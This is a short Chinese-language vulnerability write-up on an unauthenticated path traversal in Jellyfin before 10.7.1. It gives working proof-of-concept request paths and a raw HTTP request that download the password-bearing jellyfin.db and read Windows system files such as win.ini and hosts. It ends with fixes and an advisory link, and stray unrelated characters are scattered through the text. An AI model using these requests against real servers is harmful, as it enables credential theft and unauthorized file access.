漏洞簡(jiǎn)介:
jellyfin 是一個(gè)自由的軟件媒體系統(tǒng)堡称,用于控制和管理媒體和流媒體。它是 emby 和 plex 的替代品墙贱,它通過(guò)多個(gè)應(yīng)用程序從專(zhuān)用服務(wù)器向終端用戶(hù)設(shè)備提供媒體热芹。Jellyfin 屬于 Emby 3.5.2 的下一代,并移植 .NET 核心框架惨撇,以支持完全的跨平臺(tái)支持伊脓。
影響版本:
Jellyfin<10.7.1
漏洞復(fù)現(xiàn):
利用POC:
從服務(wù)器下載帶有密碼的jellyfin.db:
/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/?
未經(jīng)授權(quán)讀取windows的文件
GET? /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.aac/
GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
讀取host文件
/Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts/stream.mp3/
讀取帶有密碼的數(shù)據(jù)庫(kù)文件
/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/
GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
修復(fù)建議:
??? 1、更新至10.7.1版本魁衙。
????2报腔、在Web應(yīng)用防火墻上添加防護(hù)規(guī)則
參考鏈接:https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
